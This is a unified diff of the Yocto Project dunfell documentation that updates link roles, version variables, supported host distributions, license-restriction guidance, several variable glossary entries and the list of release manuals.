@@ -468,7 +468,7 @@ Git uses "tags" to mark specific changes in a repository branch
468structure. Typically, a tag is used to mark a special point such as the 468structure. Typically, a tag is used to mark a special point such as the
469final change (or commit) before a project is released. You can see the 469final change (or commit) before a project is released. You can see the
470tags used with the ``poky`` Git repository by going to 470tags used with the ``poky`` Git repository by going to
471https://git.yoctoproject.org/cgit.cgi/poky/ and clicking on the ``[...]`` link 471:yocto_git:`/cgit.cgi/poky/` and clicking on the ``[...]`` link
472beneath the "Tag" heading. 472beneath the "Tag" heading.
473 473
474Some key tags for the ``poky`` repository are ``jethro-14.0.3``, 474Some key tags for the ``poky`` repository are ``jethro-14.0.3``,
diff --git a/documentation/overview-manual/overview-manual-yp-intro.rst b/documentation/overview-manual/overview-manual-yp-intro.rst
index f1c725ac27..2675074f14 100644
--- a/documentation/overview-manual/overview-manual-yp-intro.rst
+++ b/documentation/overview-manual/overview-manual-yp-intro.rst
@@ -271,8 +271,8 @@ with the string ``meta-``.
271 , but it is a commonly accepted standard in the Yocto Project 271 , but it is a commonly accepted standard in the Yocto Project
272 community. 272 community.
273 273
274For example, if you were to examine the `tree 274For example, if you were to examine the :yocto_git:`tree
275view <https://git.yoctoproject.org/cgit/cgit.cgi/poky/tree/>`__ of the 275view </cgit/cgit.cgi/poky/tree/>` of the
276``poky`` repository, you will see several layers: ``meta``, 276``poky`` repository, you will see several layers: ``meta``,
277``meta-skeleton``, ``meta-selftest``, ``meta-poky``, and 277``meta-skeleton``, ``meta-selftest``, ``meta-poky``, and
278``meta-yocto-bsp``. Each of these repositories represents a distinct 278``meta-yocto-bsp``. Each of these repositories represents a distinct
@@ -377,7 +377,7 @@ activities using the Yocto Project:
377 Index <http://layers.openembedded.org/layerindex/layers/>`__, which 377 Index <http://layers.openembedded.org/layerindex/layers/>`__, which
378 is a website that indexes OpenEmbedded-Core layers. 378 is a website that indexes OpenEmbedded-Core layers.
379 379
380- *Patchwork:* `Patchwork <http://jk.ozlabs.org/projects/patchwork/>`__ 380- *Patchwork:* `Patchwork <https://patchwork.yoctoproject.org/>`__
381 is a fork of a project originally started by 381 is a fork of a project originally started by
382 `OzLabs <http://ozlabs.org/>`__. The project is a web-based tracking 382 `OzLabs <http://ozlabs.org/>`__. The project is a web-based tracking
383 system designed to streamline the process of bringing contributions 383 system designed to streamline the process of bringing contributions
diff --git a/documentation/poky.yaml b/documentation/poky.yaml
index ee9b2acbeb..0ab046428b 100644
--- a/documentation/poky.yaml
+++ b/documentation/poky.yaml
@@ -1,11 +1,13 @@
1DISTRO : "3.1.6" 1DISTRO : "3.1.33"
2DISTRO_NAME_NO_CAP : "dunfell" 2DISTRO_NAME_NO_CAP : "dunfell"
3DISTRO_NAME : "Dunfell" 3DISTRO_NAME : "Dunfell"
4DISTRO_NAME_NO_CAP_MINUS_ONE : "zeus" 4DISTRO_NAME_NO_CAP_MINUS_ONE : "zeus"
5YOCTO_DOC_VERSION : "3.1.6" 5YOCTO_DOC_VERSION : "3.1.33"
6YOCTO_DOC_VERSION_MINUS_ONE : "3.0.2" 6YOCTO_DOC_VERSION_MINUS_ONE : "3.0.4"
7DISTRO_REL_TAG : "yocto-3.1.6" 7DISTRO_REL_TAG : "yocto-3.1.33"
8POKYVERSION : "23.0.6" 8DOCCONF_VERSION : "3.1.33"
9BITBAKE_SERIES : "1.46"
10POKYVERSION : "23.0.33"
9YOCTO_POKY : "poky-&DISTRO_NAME_NO_CAP;-&POKYVERSION;" 11YOCTO_POKY : "poky-&DISTRO_NAME_NO_CAP;-&POKYVERSION;"
10YOCTO_DL_URL : "https://downloads.yoctoproject.org" 12YOCTO_DL_URL : "https://downloads.yoctoproject.org"
11YOCTO_AB_URL : "https://autobuilder.yoctoproject.org" 13YOCTO_AB_URL : "https://autobuilder.yoctoproject.org"
@@ -18,7 +20,8 @@ FEDORA_HOST_PACKAGES_ESSENTIAL : "gawk make wget tar bzip2 gzip python3 unzip pe
18 diffutils diffstat git cpp gcc gcc-c++ glibc-devel texinfo chrpath \ 20 diffutils diffstat git cpp gcc gcc-c++ glibc-devel texinfo chrpath \
19 ccache perl-Data-Dumper perl-Text-ParseWords perl-Thread-Queue perl-bignum socat \ 21 ccache perl-Data-Dumper perl-Text-ParseWords perl-Thread-Queue perl-bignum socat \
20 python3-pexpect findutils which file cpio python python3-pip xz python3-GitPython \ 22 python3-pexpect findutils which file cpio python python3-pip xz python3-GitPython \
21 python3-jinja2 SDL-devel xterm rpcgen mesa-libGL-devel" 23 python3-jinja2 SDL-devel xterm rpcgen mesa-libGL-devel perl-FindBin perl-File-Compare \
24 perl-File-Copy perl-locale"
22OPENSUSE_HOST_PACKAGES_ESSENTIAL : "python gcc gcc-c++ git chrpath make wget python-xml \ 25OPENSUSE_HOST_PACKAGES_ESSENTIAL : "python gcc gcc-c++ git chrpath make wget python-xml \
23 diffstat makeinfo python-curses patch socat python3 python3-curses tar python3-pip \ 26 diffstat makeinfo python-curses patch socat python3 python3-curses tar python3-pip \
24 python3-pexpect xz which python3-Jinja2 Mesa-libEGL1 libSDL-devel xterm rpcgen Mesa-dri-devel 27 python3-pexpect xz which python3-Jinja2 Mesa-libEGL1 libSDL-devel xterm rpcgen Mesa-dri-devel
diff --git a/documentation/profile-manual/profile-manual-usage.rst b/documentation/profile-manual/profile-manual-usage.rst
index d3c020a1cf..e389a13fc0 100644
--- a/documentation/profile-manual/profile-manual-usage.rst
+++ b/documentation/profile-manual/profile-manual-usage.rst
@@ -1169,9 +1169,8 @@ e.g. 'perf help' or 'perf help record'.
1169 1169
1170However, by default Yocto doesn't install man pages, but perf invokes 1170However, by default Yocto doesn't install man pages, but perf invokes
1171the man pages for most help functionality. This is a bug and is being 1171the man pages for most help functionality. This is a bug and is being
1172addressed by a Yocto bug: `Bug 3388 - perf: enable man pages for basic 1172addressed by a Yocto bug: :yocto_bugs:`Bug 3388 - perf: enable man pages for basic
1173'help' 1173'help' functionality </show_bug.cgi?id=3388>`.
1174functionality <https://bugzilla.yoctoproject.org/show_bug.cgi?id=3388>`__.
1175 1174
1176The man pages in text form, along with some other files, such as a set 1175The man pages in text form, along with some other files, such as a set
1177of examples, can be found in the 'perf' directory of the kernel tree: :: 1176of examples, can be found in the 'perf' directory of the kernel tree: ::
@@ -1735,7 +1734,7 @@ events':
1735 1734
1736The tool is pretty self-explanatory, but for more detailed information 1735The tool is pretty self-explanatory, but for more detailed information
1737on navigating through the data, see the `kernelshark 1736on navigating through the data, see the `kernelshark
1738website <http://rostedt.homelinux.com/kernelshark/>`__. 1737website <https://kernelshark.org/Documentation.html>`__.
1739 1738
1740.. _ftrace-documentation: 1739.. _ftrace-documentation:
1741 1740
@@ -1766,8 +1765,8 @@ There is a nice series of articles on using ftrace and trace-cmd at LWN:
1766- `trace-cmd: A front-end for 1765- `trace-cmd: A front-end for
1767 Ftrace <https://lwn.net/Articles/410200/>`__ 1766 Ftrace <https://lwn.net/Articles/410200/>`__
1768 1767
1769There's more detailed documentation kernelshark usage here: 1768See also `KernelShark's documentation <https://kernelshark.org/Documentation.html>`__
1770`KernelShark <http://rostedt.homelinux.com/kernelshark/>`__ 1769for further usage details.
1771 1770
1772An amusing yet useful README (a tracing mini-HOWTO) can be found in 1771An amusing yet useful README (a tracing mini-HOWTO) can be found in
1773``/sys/kernel/debug/tracing/README``. 1772``/sys/kernel/debug/tracing/README``.
diff --git a/documentation/ref-manual/migration-3.0.rst b/documentation/ref-manual/migration-3.0.rst
index 047b75526f..50f7d697b0 100644
--- a/documentation/ref-manual/migration-3.0.rst
+++ b/documentation/ref-manual/migration-3.0.rst
@@ -184,8 +184,7 @@ The following BitBake changes have occurred.
184 exceptions. Remove this argument in any calls to 184 exceptions. Remove this argument in any calls to
185 ``bb.build.exec_func()`` in custom classes or scripts. 185 ``bb.build.exec_func()`` in custom classes or scripts.
186 186
187- The 187- The ``BB_SETSCENE_VERIFY_FUNCTION2`` variable
188 :term:`bitbake:BB_SETSCENE_VERIFY_FUNCTION2`
189 is no longer used. In the unlikely event that you have any references 188 is no longer used. In the unlikely event that you have any references
190 to it, they should be removed. 189 to it, they should be removed.
191 190
diff --git a/documentation/ref-manual/ref-classes.rst b/documentation/ref-manual/ref-classes.rst
index e657fe0e55..dea27eea88 100644
--- a/documentation/ref-manual/ref-classes.rst
+++ b/documentation/ref-manual/ref-classes.rst
@@ -1315,16 +1315,6 @@ The following list shows the tests you can list with the ``WARN_QA`` and
1315 automatically get these versions. Consequently, you should only need 1315 automatically get these versions. Consequently, you should only need
1316 to explicitly add dependencies to binary driver recipes. 1316 to explicitly add dependencies to binary driver recipes.
1317 1317
1318.. _ref-classes-insserv:
1319
1320``insserv.bbclass``
1321===================
1322
1323The ``insserv`` class uses the ``insserv`` utility to update the order
1324of symbolic links in ``/etc/rc?.d/`` within an image based on
1325dependencies specified by LSB headers in the ``init.d`` scripts
1326themselves.
1327
1328.. _ref-classes-kernel: 1318.. _ref-classes-kernel:
1329 1319
1330``kernel.bbclass`` 1320``kernel.bbclass``
diff --git a/documentation/ref-manual/ref-features.rst b/documentation/ref-manual/ref-features.rst
index f28ad2bb4c..be3a9e3a3e 100644
--- a/documentation/ref-manual/ref-features.rst
+++ b/documentation/ref-manual/ref-features.rst
@@ -63,6 +63,8 @@ Project metadata:
63 63
64- *keyboard:* Hardware has a keyboard 64- *keyboard:* Hardware has a keyboard
65 65
66- *numa:* Hardware has non-uniform memory access
67
66- *pcbios:* Support for booting through BIOS 68- *pcbios:* Support for booting through BIOS
67 69
68- *pci:* Hardware has a PCI bus 70- *pci:* Hardware has a PCI bus
diff --git a/documentation/ref-manual/ref-images.rst b/documentation/ref-manual/ref-images.rst
index 56ec8562f8..70feadf1ff 100644
--- a/documentation/ref-manual/ref-images.rst
+++ b/documentation/ref-manual/ref-images.rst
@@ -14,16 +14,17 @@ image you want.
14 Building an image without GNU General Public License Version 3 14 Building an image without GNU General Public License Version 3
15 (GPLv3), GNU Lesser General Public License Version 3 (LGPLv3), and 15 (GPLv3), GNU Lesser General Public License Version 3 (LGPLv3), and
16 the GNU Affero General Public License Version 3 (AGPL-3.0) components 16 the GNU Affero General Public License Version 3 (AGPL-3.0) components
17 is only supported for minimal and base images. Furthermore, if you 17 is only tested for core-image-minimal image. Furthermore, if you would like to
18 are going to build an image using non-GPLv3 and similarly licensed 18 build an image and verify that it does not include GPLv3 and similarly licensed
19 components, you must make the following changes in the ``local.conf`` 19 components, you must make the following changes in the image recipe
20 file before using the BitBake command to build the minimal or base 20 file before using the BitBake command to build the image:
21 image:
22 ::
23 21
24 1. Comment out the EXTRA_IMAGE_FEATURES line 22 INCOMPATIBLE_LICENSE = "GPL-3.0* LGPL-3.0*"
25 2. Set INCOMPATIBLE_LICENSE = "GPL-3.0 LGPL-3.0 AGPL-3.0"
26 23
24 Alternatively, you can adjust ``local.conf`` file, repeating and adjusting the line
25 for all images where the license restriction must apply:
26
27 INCOMPATIBLE_LICENSE_pn-your-image-name = "GPL-3.0* LGPL-3.0*"
27 28
28From within the ``poky`` Git repository, you can use the following 29From within the ``poky`` Git repository, you can use the following
29command to display the list of directories within the :term:`Source Directory` 30command to display the list of directories within the :term:`Source Directory`
diff --git a/documentation/ref-manual/ref-release-process.rst b/documentation/ref-manual/ref-release-process.rst
index a6d9ff60ec..8dcbea7beb 100644
--- a/documentation/ref-manual/ref-release-process.rst
+++ b/documentation/ref-manual/ref-release-process.rst
@@ -138,7 +138,7 @@ consists of the following pieces:
138 piece of software. The test allows the packages to be be run within a 138 piece of software. The test allows the packages to be be run within a
139 target image. 139 target image.
140 140
141- ``oe-selftest``: Tests combination BitBake invocations. These tests 141- ``oe-selftest``: Tests combinations of BitBake invocations. These tests
142 operate outside the OpenEmbedded build system itself. The 142 operate outside the OpenEmbedded build system itself. The
143 ``oe-selftest`` can run all tests by default or can run selected 143 ``oe-selftest`` can run all tests by default or can run selected
144 tests or test suites. 144 tests or test suites.
diff --git a/documentation/ref-manual/ref-system-requirements.rst b/documentation/ref-manual/ref-system-requirements.rst
index 65234d0722..efb60e1009 100644
--- a/documentation/ref-manual/ref-system-requirements.rst
+++ b/documentation/ref-manual/ref-system-requirements.rst
@@ -34,16 +34,30 @@ and conceptual information in the :doc:`../overview-manual/overview-manual`.
34Supported Linux Distributions 34Supported Linux Distributions
35============================= 35=============================
36 36
37Currently, the Yocto Project is supported on the following 37Currently, the &DISTRO; release ("&DISTRO_NAME;") of the Yocto Project is
38distributions: 38supported on the following distributions:
39 39
40- Ubuntu 16.04 (LTS) 40- Ubuntu 20.04 (LTS)
41
42- Ubuntu 22.04 (LTS)
43
44- Fedora 38
45
46- Debian GNU/Linux 11.x (Bullseye)
47
48- AlmaLinux 8
49
50The following distribution versions are still tested even though the
51organizations publishing them no longer make updates publicly available:
41 52
42- Ubuntu 18.04 (LTS) 53- Ubuntu 18.04 (LTS)
43 54
44- Ubuntu 19.04 55Finally, here are the distribution versions which were previously
56tested on former revisions of "&DISTRO_NAME;", but no longer are:
45 57
46- Ubuntu 20.04 58- Ubuntu 16.04 (LTS)
59
60- Ubuntu 19.04
47 61
48- Fedora 28 62- Fedora 28
49 63
@@ -55,8 +69,20 @@ distributions:
55 69
56- Fedora 32 70- Fedora 32
57 71
72- Fedora 33
73
74- Fedora 34
75
76- Fedora 35
77
78- Fedora 36
79
80- Fedora 37
81
58- CentOS 7.x 82- CentOS 7.x
59 83
84- CentOS 8.x
85
60- Debian GNU/Linux 8.x (Jessie) 86- Debian GNU/Linux 8.x (Jessie)
61 87
62- Debian GNU/Linux 9.x (Stretch) 88- Debian GNU/Linux 9.x (Stretch)
@@ -65,6 +91,9 @@ distributions:
65 91
66- OpenSUSE Leap 15.1 92- OpenSUSE Leap 15.1
67 93
94- OpenSUSE Leap 15.2
95
96- OpenSUSE Leap 15.3
68 97
69.. note:: 98.. note::
70 99
@@ -338,7 +367,7 @@ Downloading a Pre-Built ``buildtools`` Tarball
338Downloading and running a pre-built buildtools installer is the easiest 367Downloading and running a pre-built buildtools installer is the easiest
339of the two methods by which you can get these tools: 368of the two methods by which you can get these tools:
340 369
3411. Locate and download the ``*.sh`` at &YOCTO_RELEASE_DL_URL;/buildtools/ 3701. Locate and download the ``*.sh`` at :yocto_dl:`/releases/yocto/&DISTRO_REL_TAG;/buildtools/`
342 371
3432. Execute the installation script. Here is an example for the 3722. Execute the installation script. Here is an example for the
344 traditional installer: 373 traditional installer:
diff --git a/documentation/ref-manual/ref-tasks.rst b/documentation/ref-manual/ref-tasks.rst
index 4ed15365f3..2f1959a010 100644
--- a/documentation/ref-manual/ref-tasks.rst
+++ b/documentation/ref-manual/ref-tasks.rst
@@ -331,22 +331,19 @@ file as a patch file:
331 file://file;apply=yes \ 331 file://file;apply=yes \
332 " 332 "
333 333
334Conversely, if you have a directory full of patch files and you want to 334Conversely, if you have a file whose file type is ``.patch`` or ``.diff``
335exclude some so that the ``do_patch`` task does not apply them during 335and you want to exclude it so that the ``do_patch`` task does not apply
336the patch phase, you can use the "apply=no" parameter with the 336it during the patch phase, you can use the "apply=no" parameter with the
337``SRC_URI`` statement: 337:term:`SRC_URI` statement::
338::
339 338
340 SRC_URI = " \ 339 SRC_URI = " \
341 git://path_to_repo/some_package \ 340 git://path_to_repo/some_package \
342 file://path_to_lots_of_patch_files \ 341 file://file1.patch \
343 file://path_to_lots_of_patch_files/patch_file5;apply=no \ 342 file://file2.patch;apply=no \
344 " 343 "
345 344
346In the 345In the previous example ``file1.patch`` would be applied as a patch by default
347previous example, assuming all the files in the directory holding the 346while ``file2.patch`` would not be applied.
348patch files end with either ``.patch`` or ``.diff``, every file would be
349applied as a patch by default except for the ``patch_file5`` patch.
350 347
351You can find out more about the patching process in the 348You can find out more about the patching process in the
352":ref:`patching-dev-environment`" section in 349":ref:`patching-dev-environment`" section in
diff --git a/documentation/ref-manual/ref-variables.rst b/documentation/ref-manual/ref-variables.rst
index a8375cd37c..227c81fc39 100644
--- a/documentation/ref-manual/ref-variables.rst
+++ b/documentation/ref-manual/ref-variables.rst
@@ -3337,9 +3337,18 @@ system and gives an overview of their function and contents.
3337 :term:`INCOMPATIBLE_LICENSE` 3337 :term:`INCOMPATIBLE_LICENSE`
3338 Specifies a space-separated list of license names (as they would 3338 Specifies a space-separated list of license names (as they would
3339 appear in :term:`LICENSE`) that should be excluded 3339 appear in :term:`LICENSE`) that should be excluded
3340 from the build. Recipes that provide no alternatives to listed 3340 from the build (if set globally), or from an image (if set locally
3341 in an image recipe).
3342
3343 When the variable is set globally, recipes that provide no alternatives to listed
3341 incompatible licenses are not built. Packages that are individually 3344 incompatible licenses are not built. Packages that are individually
3342 licensed with the specified incompatible licenses will be deleted. 3345 licensed with the specified incompatible licenses will be deleted.
3346 Most of the time this does not allow a feasible build (because it becomes impossible
3347 to satisfy build time dependencies), so the recommended way to
3348 implement license restrictions is to set the variable in specific
3349 image recipes where the restrictions must apply. That way there
3350 are no build time restrictions, but the license check is still
3351 performed when the image's filesystem is assembled from packages.
3343 3352
3344 .. note:: 3353 .. note::
3345 3354
@@ -3811,6 +3820,15 @@ system and gives an overview of their function and contents.
3811 3820
3812 KERNEL_ARTIFACT_NAME ?= "${PKGE}-${PKGV}-${PKGR}-${MACHINE}${IMAGE_VERSION_SUFFIX}" 3821 KERNEL_ARTIFACT_NAME ?= "${PKGE}-${PKGV}-${PKGR}-${MACHINE}${IMAGE_VERSION_SUFFIX}"
3813 3822
3823 :term:`KERNEL_DTC_FLAGS`
3824 Specifies the ``dtc`` flags that are passed to the Linux kernel build
3825 system when generating the device trees (via ``DTC_FLAGS`` environment
3826 variable).
3827
3828 In order to use this variable, the
3829 :ref:`kernel-devicetree <ref-classes-kernel-devicetree>` class must
3830 be inherited.
3831
3814 :term:`KERNEL_EXTRA_ARGS` 3832 :term:`KERNEL_EXTRA_ARGS`
3815 Specifies additional ``make`` command-line arguments the OpenEmbedded 3833 Specifies additional ``make`` command-line arguments the OpenEmbedded
3816 build system passes on when compiling the kernel. 3834 build system passes on when compiling the kernel.
@@ -3837,10 +3855,10 @@ system and gives an overview of their function and contents.
3837 :: 3855 ::
3838 3856
3839 KERNEL_EXTRA_FEATURES ?= "features/netfilter/netfilter.scc features/taskstats/taskstats.scc" 3857 KERNEL_EXTRA_FEATURES ?= "features/netfilter/netfilter.scc features/taskstats/taskstats.scc"
3840 KERNEL_FEATURES_append = "${KERNEL_EXTRA_FEATURES}" 3858 KERNEL_FEATURES_append = " ${KERNEL_EXTRA_FEATURES}"
3841 KERNEL_FEATURES_append_qemuall = "cfg/virtio.scc" 3859 KERNEL_FEATURES_append_qemuall = " cfg/virtio.scc"
3842 KERNEL_FEATURES_append_qemux86 = " cfg/sound.scc cfg/paravirt_kvm.scc" 3860 KERNEL_FEATURES_append_qemux86 = " cfg/sound.scc cfg/paravirt_kvm.scc"
3843 KERNEL_FEATURES_append_qemux86-64 = "cfg/sound.scc" 3861 KERNEL_FEATURES_append_qemux86-64 = " cfg/sound.scc"
3844 3862
3845 :term:`KERNEL_FIT_LINK_NAME` 3863 :term:`KERNEL_FIT_LINK_NAME`
3846 The link name of the kernel flattened image tree (FIT) image. This 3864 The link name of the kernel flattened image tree (FIT) image. This
@@ -4039,7 +4057,7 @@ system and gives an overview of their function and contents.
4039 SRCREV_machine_core2-32-intel-common = "43b9eced9ba8a57add36af07736344dcc383f711" 4057 SRCREV_machine_core2-32-intel-common = "43b9eced9ba8a57add36af07736344dcc383f711"
4040 KMACHINE_core2-32-intel-common = "intel-core2-32" 4058 KMACHINE_core2-32-intel-common = "intel-core2-32"
4041 KBRANCH_core2-32-intel-common = "standard/base" 4059 KBRANCH_core2-32-intel-common = "standard/base"
4042 KERNEL_FEATURES_append_core2-32-intel-common = "${KERNEL_FEATURES_INTEL_COMMON}" 4060 KERNEL_FEATURES_append_core2-32-intel-common = " ${KERNEL_FEATURES_INTEL_COMMON}"
4043 4061
4044 The ``KMACHINE`` statement says 4062 The ``KMACHINE`` statement says
4045 that the kernel understands the machine name as "intel-core2-32". 4063 that the kernel understands the machine name as "intel-core2-32".
@@ -7138,6 +7156,32 @@ system and gives an overview of their function and contents.
7138 :term:`SSTATE_DIR` 7156 :term:`SSTATE_DIR`
7139 The directory for the shared state cache. 7157 The directory for the shared state cache.
7140 7158
7159 :term:`SSTATE_EXCLUDEDEPS_SYSROOT`
7160 This variable allows to specify indirect dependencies to exclude
7161 from sysroots, for example to avoid the situations when a dependency on
7162 any ``-native`` recipe will pull in all dependencies of that recipe
7163 in the recipe sysroot. This behaviour might not always be wanted,
7164 for example when that ``-native`` recipe depends on build tools
7165 that are not relevant for the current recipe.
7166
7167 This way, irrelevant dependencies are ignored, which could have
7168 prevented the reuse of prebuilt artifacts stored in the Shared
7169 State Cache.
7170
7171 :term:`SSTATE_EXCLUDEDEPS_SYSROOT` is evaluated as two regular
7172 expressions of recipe and dependency to ignore. An example
7173 is the rule in :oe_git:`meta/conf/layer.conf </openembedded-core/tree/meta/conf/layer.conf>`::
7174
7175 # Nothing needs to depend on libc-initial
7176 # base-passwd/shadow-sysroot don't need their dependencies
7177 SSTATE_EXCLUDEDEPS_SYSROOT += "\
7178 .*->.*-initial.* \
7179 .*(base-passwd|shadow-sysroot)->.* \
7180 "
7181
7182 The ``->`` substring represents the dependency between
7183 the two regular expressions.
7184
7141 :term:`SSTATE_MIRROR_ALLOW_NETWORK` 7185 :term:`SSTATE_MIRROR_ALLOW_NETWORK`
7142 If set to "1", allows fetches from mirrors that are specified in 7186 If set to "1", allows fetches from mirrors that are specified in
7143 :term:`SSTATE_MIRRORS` to work even when 7187 :term:`SSTATE_MIRRORS` to work even when
@@ -7533,7 +7577,7 @@ system and gives an overview of their function and contents.
7533 ``SYSTEMD_BOOT_CFG`` as follows: 7577 ``SYSTEMD_BOOT_CFG`` as follows:
7534 :: 7578 ::
7535 7579
7536 SYSTEMD_BOOT_CFG ?= "${:term:`S`}/loader.conf" 7580 SYSTEMD_BOOT_CFG ?= "${S}/loader.conf"
7537 7581
7538 For information on Systemd-boot, see the `Systemd-boot 7582 For information on Systemd-boot, see the `Systemd-boot
7539 documentation <http://www.freedesktop.org/wiki/Software/systemd/systemd-boot/>`__. 7583 documentation <http://www.freedesktop.org/wiki/Software/systemd/systemd-boot/>`__.
@@ -8736,4 +8780,22 @@ system and gives an overview of their function and contents.
8736 8780
8737 The default value of ``XSERVER``, if not specified in the machine 8781 The default value of ``XSERVER``, if not specified in the machine
8738 configuration, is "xserver-xorg xf86-video-fbdev xf86-input-evdev". 8782 configuration, is "xserver-xorg xf86-video-fbdev xf86-input-evdev".
8739 8783
8784 :term:`XZ_THREADS`
8785 Specifies the number of parallel threads that should be used when
8786 using xz compression.
8787
8788 By default this scales with core count, but is never set less than 2
8789 to ensure that multi-threaded mode is always used so that the output
8790 file contents are deterministic. Builds will work with a value of 1
8791 but the output will differ compared to the output from the compression
8792 generated when more than one thread is used.
8793
8794 On systems where many tasks run in parallel, setting a limit to this
8795 can be helpful in controlling system resource usage.
8796
8797 :term:`XZ_MEMLIMIT`
8798 Specifies the maximum memory the xz compression should use as a percentage
8799 of system memory. If unconstrained the xz compressor can use large amounts of
8800 memory and become problematic with parallelism elsewhere in the build.
8801 "50%" has been found to be a good value.
diff --git a/documentation/releases.rst b/documentation/releases.rst
index 536c3a6d2c..affe63403c 100644
--- a/documentation/releases.rst
+++ b/documentation/releases.rst
@@ -1,32 +1,72 @@
1.. SPDX-License-Identifier: CC-BY-SA-2.0-UK 1.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
2 2
3========================= 3===========================
4 Current Release Manuals 4 Supported Release Manuals
5========================= 5===========================
6
7******************************
8Release Series 3.4 (honister)
9******************************
10
11- :yocto_docs:`3.4 Documentation </3.4>`
12- :yocto_docs:`3.4.1 Documentation </3.4.1>`
13
14******************************
15Release Series 3.3 (hardknott)
16******************************
17
18- :yocto_docs:`3.3 Documentation </3.3>`
19- :yocto_docs:`3.3.1 Documentation </3.3.1>`
20- :yocto_docs:`3.3.2 Documentation </3.3.2>`
21- :yocto_docs:`3.3.3 Documentation </3.3.3>`
22- :yocto_docs:`3.3.4 Documentation </3.3.4>`
6 23
7**************************** 24****************************
83.1 'dunfell' Release Series 25Release Series 3.1 (dunfell)
9**************************** 26****************************
10 27
11- :yocto_docs:`3.1 Documentation </3.1>` 28- :yocto_docs:`3.1 Documentation </3.1>`
12- :yocto_docs:`3.1.1 Documentation </3.1.1>` 29- :yocto_docs:`3.1.1 Documentation </3.1.1>`
13- :yocto_docs:`3.1.2 Documentation </3.1.2>` 30- :yocto_docs:`3.1.2 Documentation </3.1.2>`
31- :yocto_docs:`3.1.3 Documentation </3.1.3>`
32- :yocto_docs:`3.1.4 Documentation </3.1.4>`
33- :yocto_docs:`3.1.5 Documentation </3.1.5>`
34- :yocto_docs:`3.1.6 Documentation </3.1.6>`
35- :yocto_docs:`3.1.7 Documentation </3.1.7>`
36- :yocto_docs:`3.1.8 Documentation </3.1.8>`
37- :yocto_docs:`3.1.9 Documentation </3.1.9>`
38- :yocto_docs:`3.1.10 Documentation </3.1.10>`
39- :yocto_docs:`3.1.11 Documentation </3.1.11>`
40- :yocto_docs:`3.1.12 Documentation </3.1.12>`
41- :yocto_docs:`3.1.13 Documentation </3.1.13>`
42- :yocto_docs:`3.1.14 Documentation </3.1.14>`
14 43
15========================== 44==========================
16 Previous Release Manuals 45 Outdated Release Manuals
17========================== 46==========================
18 47
48*******************************
49Release Series 3.2 (gatesgarth)
50*******************************
51
52- :yocto_docs:`3.2 Documentation </3.2>`
53- :yocto_docs:`3.2.1 Documentation </3.2.1>`
54- :yocto_docs:`3.2.2 Documentation </3.2.2>`
55- :yocto_docs:`3.2.3 Documentation </3.2.3>`
56- :yocto_docs:`3.2.4 Documentation </3.2.4>`
57
19************************* 58*************************
203.0 'zeus' Release Series 59Release Series 3.0 (zeus)
21************************* 60*************************
22 61
23- :yocto_docs:`3.0 Documentation </3.0>` 62- :yocto_docs:`3.0 Documentation </3.0>`
24- :yocto_docs:`3.0.1 Documentation </3.0.1>` 63- :yocto_docs:`3.0.1 Documentation </3.0.1>`
25- :yocto_docs:`3.0.2 Documentation </3.0.2>` 64- :yocto_docs:`3.0.2 Documentation </3.0.2>`
26- :yocto_docs:`3.0.3 Documentation </3.0.3>` 65- :yocto_docs:`3.0.3 Documentation </3.0.3>`
66- :yocto_docs:`3.0.4 Documentation </3.0.4>`
27 67
28**************************** 68****************************
292.7 'warrior' Release Series 69Release Series 2.7 (warrior)
30**************************** 70****************************
31 71
32- :yocto_docs:`2.7 Documentation </2.7>` 72- :yocto_docs:`2.7 Documentation </2.7>`
@@ -36,7 +76,7 @@
36- :yocto_docs:`2.7.4 Documentation </2.7.4>` 76- :yocto_docs:`2.7.4 Documentation </2.7.4>`
37 77
38************************* 78*************************
392.6 'thud' Release Series 79Release Series 2.6 (thud)
40************************* 80*************************
41 81
42- :yocto_docs:`2.6 Documentation </2.6>` 82- :yocto_docs:`2.6 Documentation </2.6>`
@@ -46,16 +86,16 @@
46- :yocto_docs:`2.6.4 Documentation </2.6.4>` 86- :yocto_docs:`2.6.4 Documentation </2.6.4>`
47 87
48************************* 88*************************
492.5 'sumo' Release Series 89Release Series 2.5 (sumo)
50************************* 90*************************
51 91
52- :yocto_docs:`2.5 Documentation </2.5>` 92- :yocto_docs:`2.5 Documentation </2.5>`
53- :yocto_docs:`2.5.1 Documentation </2.5.1>` 93- :yocto_docs:`2.5.1 Documentation </2.5.1>`
54- :yocto_docs:`2.5.2 Documentation </2.5.2>` 94- :yocto_docs:`2.5.2 Documentation </2.5.2>`
55- :yocto_docs:`2.5.3 Documentation </2.5.3>` 95- :yocto_docs:`2.5.3 Documentation </2.5.3>`
56 96
57************************** 97**************************
582.4 'rocko' Release Series 98Release Series 2.4 (rocko)
59************************** 99**************************
60 100
61- :yocto_docs:`2.4 Documentation </2.4>` 101- :yocto_docs:`2.4 Documentation </2.4>`
@@ -65,7 +105,7 @@
65- :yocto_docs:`2.4.4 Documentation </2.4.4>` 105- :yocto_docs:`2.4.4 Documentation </2.4.4>`
66 106
67************************* 107*************************
682.3 'pyro' Release Series 108Release Series 2.3 (pyro)
69************************* 109*************************
70 110
71- :yocto_docs:`2.3 Documentation </2.3>` 111- :yocto_docs:`2.3 Documentation </2.3>`
@@ -75,7 +115,7 @@
75- :yocto_docs:`2.3.4 Documentation </2.3.4>` 115- :yocto_docs:`2.3.4 Documentation </2.3.4>`
76 116
77************************** 117**************************
782.2 'morty' Release Series 118Release Series 2.2 (morty)
79************************** 119**************************
80 120
81- :yocto_docs:`2.2 Documentation </2.2>` 121- :yocto_docs:`2.2 Documentation </2.2>`
@@ -84,7 +124,7 @@
84- :yocto_docs:`2.2.3 Documentation </2.2.3>` 124- :yocto_docs:`2.2.3 Documentation </2.2.3>`
85 125
86**************************** 126****************************
872.1 'krogoth' Release Series 127Release Series 2.1 (krogoth)
88**************************** 128****************************
89 129
90- :yocto_docs:`2.1 Documentation </2.1>` 130- :yocto_docs:`2.1 Documentation </2.1>`
@@ -93,7 +133,7 @@
93- :yocto_docs:`2.1.3 Documentation </2.1.3>` 133- :yocto_docs:`2.1.3 Documentation </2.1.3>`
94 134
95*************************** 135***************************
962.0 'jethro' Release Series 136Release Series 2.0 (jethro)
97*************************** 137***************************
98 138
99- :yocto_docs:`1.9 Documentation </1.9>` 139- :yocto_docs:`1.9 Documentation </1.9>`
@@ -103,7 +143,7 @@
103- :yocto_docs:`2.0.3 Documentation </2.0.3>` 143- :yocto_docs:`2.0.3 Documentation </2.0.3>`
104 144
105************************* 145*************************
1061.8 'fido' Release Series 146Release Series 1.8 (fido)
107************************* 147*************************
108 148
